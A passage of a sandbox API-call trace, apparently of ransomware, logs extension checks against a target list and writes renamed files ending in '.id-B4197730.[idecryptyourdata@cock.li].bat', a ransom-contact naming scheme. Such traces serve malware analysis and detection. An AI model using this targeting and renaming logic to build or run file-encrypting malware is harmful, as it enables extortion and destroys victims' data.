lpString2=".GIF") returned -1 [0173.171] lstrlenW (lpString=".docx") returned 5 [0173.171] lstrcmpiW (lpString1=".docx", lpString2="G.GIF") returned -1 [0173.171] lstrlenW (lpString=".pdf") returned 4 [0173.171] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0173.171] lstrlenW (lpString=".xls") returned 4 [0173.171] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0173.171] lstrlenW (lpString=".xlsx") returned 5 [0173.172] lstrcmpiW (lpString1=".xlsx", lpString2="G.GIF") returned -1 [0173.172] lstrlenW (lpString=".ppt") returned 4 [0173.172] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0173.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749G.GIF") returned 68 [0173.172] lstrlenW (lpString=".zip") returned 4 [0173.172] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0173.172] lstrlenW (lpString=".rar") returned 4 [0173.172] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0173.172] lstrlenW (lpString=".bz2") returned 4 [0173.172] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0173.172] lstrlenW (lpString=".7z") returned 3 [0173.172] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0173.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749G.GIF") returned 68 [0173.172] lstrlenW (lpString=".dbf") returned 4 [0173.172] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0173.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749G.GIF") returned 68 [0173.172] lstrlenW (lpString=".1cd") returned 4 [0173.172] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0173.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749G.GIF") returned 68 [0173.172] lstrlenW (lpString=".jpg") returned 4 [0173.172] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0173.172] lstrcmpiW (lpString1=".BMP", lpString2=".bat") returned 1 [0173.173] lstrlenW (lpString="PH02754U.BMP") returned 12 [0173.173] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02754U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02754u.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0173.198] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x363ff14 | out: lpFileSize=0x363ff14*=108504) returned 1 [0173.198] CloseHandle (hObject=0x3ac) returned 1 [0173.198] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02754U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02754u.bmp")) returned 0x220 [0173.308] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02754U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02754u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0173.506] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02754U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02754u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0173.506] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.506] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.506] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02754U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02754u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.506] CloseHandle (hObject=0x37c) returned 1 [0173.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02754U.BMP") returned 68 [0173.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02754U.BMP") returned 68 [0173.507] lstrlenW (lpString=".doc") returned 4 [0173.507] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1 [0173.507] lstrlenW (lpString=".docx") returned 5 [0173.507] lstrcmpiW (lpString1=".docx", lpString2="U.BMP") returned -1 [0173.507] lstrlenW (lpString=".pdf") returned 4 [0173.507] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1 [0173.507] lstrlenW (lpString=".xls") returned 4 [0173.507] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1 [0173.507] lstrlenW (lpString=".xlsx") returned 5 [0173.507] lstrcmpiW (lpString1=".xlsx", lpString2="U.BMP") returned -1 [0173.507] lstrlenW (lpString=".ppt") returned 4 [0173.507] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1 [0173.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02754U.BMP") returned 68 [0173.507] lstrlenW (lpString=".zip") returned 4 [0173.507] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0173.507] lstrlenW (lpString=".rar") returned 4 [0173.507] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0173.507] lstrlenW (lpString=".bz2") returned 4 [0173.507] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1 [0173.507] lstrlenW (lpString=".7z") returned 3 [0173.507] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1 [0173.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02754U.BMP") returned 68 [0173.508] lstrlenW (lpString=".dbf") returned 4 [0173.508] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0173.508] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.509] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.509] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02757U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02757u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.509] CloseHandle (hObject=0x37c) returned 1 [0173.515] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.515] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02758U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02758u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.515] CloseHandle (hObject=0x37c) returned 1 [0173.518] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.518] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.518] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02759J.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02759j.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.520] CloseHandle (hObject=0x37c) returned 1 [0173.521] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.521] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.521] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02810J.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02810j.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.522] CloseHandle (hObject=0x37c) returned 1 [0173.523] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.523] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.523] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02829J.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02829j.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.524] CloseHandle (hObject=0x37c) returned 1 [0173.525] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.525] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.526] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02845G.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02845g.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.526] CloseHandle (hObject=0x37c) returned 1 [0173.527] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.527] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.527] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02897J.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02897j.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.528] CloseHandle (hObject=0x37c) returned 1 [0173.529] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.529] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.529] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03011U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03011u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.530] CloseHandle (hObject=0x37c) returned 1 [0173.530] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.530] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.531] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03012U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03012u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.531] CloseHandle (hObject=0x37c) returned 1 [0173.532] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.532] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.532] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03014_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03014_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.532] CloseHandle (hObject=0x37c) returned 1 [0173.533] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.533] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.533] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03041I.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03041i.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.533] CloseHandle (hObject=0x37c) returned 1 [0173.534] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.534] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.535] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03143I.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03143i.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.535] CloseHandle (hObject=0x37c) returned 1 [0173.536] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.536] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.536] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03205I.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03205i.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.537] CloseHandle (hObject=0x37c) returned 1 [0173.538] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.538] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.538] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03224I.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03224i.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.539] CloseHandle (hObject=0x37c) returned 1 [0173.540] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.540] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.540] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03379I.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03379i.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.540] CloseHandle (hObject=0x37c) returned 1 [0173.542] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.542] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.542] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03380I.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03380i.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.911] CloseHandle (hObject=0x37c) returned 1 [0173.923] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.923] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.923] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00483_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00483_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.923] CloseHandle (hObject=0x37c) returned 1 [0173.924] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.924] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.924] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00486_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00486_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.925] CloseHandle (hObject=0x37c) returned 1 [0173.926] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.926] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.926] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00505_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00505_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.926] CloseHandle (hObject=0x37c) returned 1 [0173.928] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.928] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.928] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00513_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00513_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.928] CloseHandle (hObject=0x37c) returned 1 [0173.937] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.937] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.937] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00555_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00555_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.938] CloseHandle (hObject=0x37c) returned 1 [0173.938] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.938] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.939] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00603_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00603_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.939] CloseHandle (hObject=0x37c) returned 1 [0173.940] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.940] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.940] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00610_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00610_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.940] CloseHandle (hObject=0x37c) returned 1 [0173.942] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.942] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.942] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00629_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00629_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.942] CloseHandle (hObject=0x37c) returned 1 [0173.943] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.943] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.943] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00633_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft 